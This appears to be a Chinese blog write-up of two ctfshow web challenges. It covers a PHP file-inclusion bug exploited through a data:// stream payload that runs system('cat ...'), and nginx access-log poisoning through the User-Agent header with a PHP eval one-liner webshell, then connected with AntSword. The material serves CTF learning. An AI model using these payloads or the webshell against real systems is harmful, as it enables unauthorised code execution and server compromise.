web3
题目
更简单的web题
分析
代码出现 include,猜测是文件包含漏洞。
通过 data://
数据流 + php 命令执行函数查询当前工作目录下的内容,使用 hackbar 需要先进行 url 编码:
得到 flag 文件名和首页文件:
?url=data://text/plain,%3C%3Fphp%0Asystem('cat ctf_go_go_go')%3B%0A%3F%3E
打开 flag 文件,得到 flag 内容。
参考
Web_XCTF_WriteUp | Web_php_include-Guanz-博客园
web4
题目
分析
和上一题显示的页面一样,用同样的方法尝试注入:
出现报错:
看来这题相比上一题增加了过滤。
使用 shell_exec
同理:
换个思路,尝试使用一句话木马连接服务器后台。
根据发回的响应包可以确定这题使用的是 nginx 服务器:
看看访问日志先,?url=/var/log/nginx/access.log
:
尝试使用日志包含写入一句话木马,往 User-Agent 字段传入一句话木马 <?php @eval($_POST['web4']);?>
传入后的日志增加一条记录:
使用中国蚁剑连接日志文件,在 /var/www/flag.txt 目录找到 flag 内容。
参考
ctfshow_WriteUp | _萌新-Guanz-博客园
标签:url,test111,flag,木马,使用,go,日志 From: https://www.cnblogs.com/Guanz/p/18308384